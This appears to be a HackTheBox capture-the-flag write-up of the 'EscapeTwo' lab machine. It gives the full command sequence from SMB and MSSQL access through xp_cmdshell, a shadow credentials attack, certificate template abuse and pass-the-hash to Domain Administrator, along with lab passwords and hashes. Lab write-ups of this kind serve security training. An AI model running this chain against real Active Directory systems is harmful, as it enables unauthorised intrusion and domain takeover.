Welcome to my HackTheBox-EscapeTwo-WriteUp! first we add machine ip to our /etc/hosts file with this command:
echo "10.10.11.51 escapetwo.htb" >> /etc/hoststhen we start enumeration with rustscan:
rustscan -a 10.10.11.51 -- -sC -sV
we see so many ports are open and there is no useful exploit for this versions of services. So we keep enumerating on smb:
smbclient -U rose --password='KxEPkKe6R8su' -L 10.10.11.51
to connect smb shares we can use metasploit with this commands
msfconsole -quse auxiliary/scanner/smb/smb_loginset RHOSTS 10.10.11.51set SMBUser roseset SMBPass 'KxEPkKe6R8su'set CreateSession truerunsessions -i 1
we see some smb shares. Inside of Accounting Department Disk we find two files and in accounts.xlsx we find four users and their passwords
From rustscan output we see that there is mssql service in port 1433. And in these accounts user sa looks like mssql user. To connect mssql service we can use impacket-mssqlclient . We can connect with this command
python3 mssqlclient.py sequel.htb/sa:"MSSQLP@ssw0rd!"@10.10.11.51
We see we cant run system commands with xp_cmdshell . We need to enable it with this commands
EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;And now we can run system commands (after running some commands mssql will reset xp_cmdshell. To run commands again just configure it again). After some enumeration we find sqlserver2019 configuration file
We can read it with this command
EXEC xp_cmdshell "type c:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI";
From output we see some passwords . We cant use evil-winrm with sql_svc user. After checking c:\Users we see there is another user named ryan and we can use his username and sql_svc password to get a shell
evil-winrm -i 10.10.11.51 -u ryan -p 'WqSZAF6CysDQbGb3'
After that we can use bloodhound-python to enumerate AD
bloodhound-python -u 'ryan' -p 'WqSZAF6CysDQbGb3' -d sequel.htb -ns 10.10.11.51 -c All --zipafter importing zip file to bloodhound we see three kerberoastable accounts
We can try to make ryan owner of ca_svc with this command
bloodyAD --host 10.10.11.51 -d escapetwo.htb -u ryan -p WqSZAF6CysDQbGb3 set owner CA_SVC ryanAfter running this command we see it allowed us. To get full control of user ca_svc we can use impacket-dacledit like this
echo "10.10.11.51 sequel.htb" >> /etc/hostspython3 dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/"ryan":"WqSZAF6CysDQbGb3"After giving full control to get hash of user ca_svc we need to make shadow credendentials attack. This attack adds key of user ryan to msDS-KeyCredentialLink of user ca_svc . After that user ryan becomes a copy account of user ca_svc. For to do this we can use certipy tool like this
certipy shadow auto -u 'ryan@sequel.htb' -p "WqSZAF6CysDQbGb3" -account 'ca_svc' -dc-ip '10.10.11.51'
Now we have ntlm hash of user ca_svc. With this user we can control certificates that determine user authorizations. We can change templates to escalate our privileges. But first we need to learn template name with this command
certipy find -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51
From this output we learn that template name is DunderMifflinAuthentication . We can change template to escalate our privileges with this command
KRB5CCNAME=$PWD/ca_svc.ccache certipy template -k -template DunderMifflinAuthentication -dc-ip 10.10.11.51 -target dc01.sequel.htbAfter updating template we can get certificate of administrator with this commands
echo "10.10.11.51 dc01.sequel.htb" >> /etc/hostscertipy req -u ca_svc -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target dc01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51After this we have Administrator's certificate . We can get hash of Administrator with this command
certipy auth -pfx administrator_10.pfx -domain sequel.htband finally we can login with evil-winrm with this command
evil-winrm -i 10.10.11.51 -u Administrator -H '7a8d4e04986afa8ed4060f75e5a0b3ff'
and done. We are Administrator. Thanks for reading!